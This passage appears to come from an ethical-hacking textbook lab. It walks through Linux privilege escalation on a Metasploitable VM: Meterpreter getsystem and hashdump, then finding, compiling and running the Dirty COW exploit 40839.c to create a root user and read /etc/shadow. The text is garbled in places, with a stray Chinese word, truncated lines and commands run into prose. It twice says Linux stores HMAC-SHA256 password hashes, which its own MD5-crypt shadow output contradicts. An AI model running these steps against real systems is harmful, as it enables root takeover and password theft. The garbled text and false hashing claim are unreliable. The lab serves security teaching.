Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the
passwords in the file /etc/shadow.
The permissions on the /etc/shadow/ file indicate that only the owner (root) and the group (shadow) can read the file, and that only a root user can write to it.
The unix-privesc tool is preinstalled on Kali Linux and allows you to check a system for vulnerabilities that might allow a privilege escalation attack:
unix-privesc-check standardThe Meterpreter shell has similar functionality built in. You can
use the command getsystem to search for and exploit possible
privilege escalation vulnerabilities:
meterpreter > getsystemAfter you gain root privileges, run the Meterpreter module
hashdump to extract the hashes from the system.
meterpreter > run hashdump举例: Performing a Dirty COW Privilege Escalation Attack
a kernel-level vulnerability nicknamed Dirty COW. The vulnerability (CVE-2016-5195) allows an
attacker without root privileges to edit any file by exploiting a bug in how the Linux kernel manages memory.
uname -a to get the current version of Linux:
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
i686 GNU/LinuxWhen you have the server’s Linux version, use searchsploit to
search for known vulnerabilities affecting that version:
kali@kali:~$ searchsploit Linux Kernel 2.6.24
------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------ -----------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) - | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc | linux/local/9844.py
...
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE | linux/local/40839.cSome exploits are more reliable than others. The Dirty COW
PTRACE exploit works reliably on the Linux version running on the
Metasploitable server.
The code for the exploit is available on your Kali Linux virtual
machine. Using searchsploit, supply the exploit number 40839.c, and
use the -p option to find the path to the exploit code:
kali@kali:~$ searchsploit -p 40839
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race
Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminatorscopy the code onto the Metasploitable machine:
kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c
[email protected]:~/Compile and execute the exploit:
msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcryptNow run the exploit (kernelexploit). You’ll be prompted to create a new root user (firefart) and provide it with a password. I’ve chosen 147 here:
msfadmin@metasploitable:~$ ./kernelexploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 147
Complete line:
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
mmap: b7fa7000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '147'.Switch to the newly created user with root privileges:
msfadmin@metasploitable:~$ su firefart
Password:Now you should be able to read the /etc/shadow file containing
the password hashes:
firefart@metasploitable:/home/msfadmin# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
...The entry should contain the HMAC-SHA256 hash of the users’
passwords. You can crack these hashes using the tools introduced
in Chapter 12. If you succeed, you’ll have escalated your privileges
and extracted the plaintext passwords for the system’s users.
Tools like spray allow you to test multiple
passwords and connections simultaneously. However, these tools do
unusual things and could generate security alerts, so you’ll want to
be careful when using them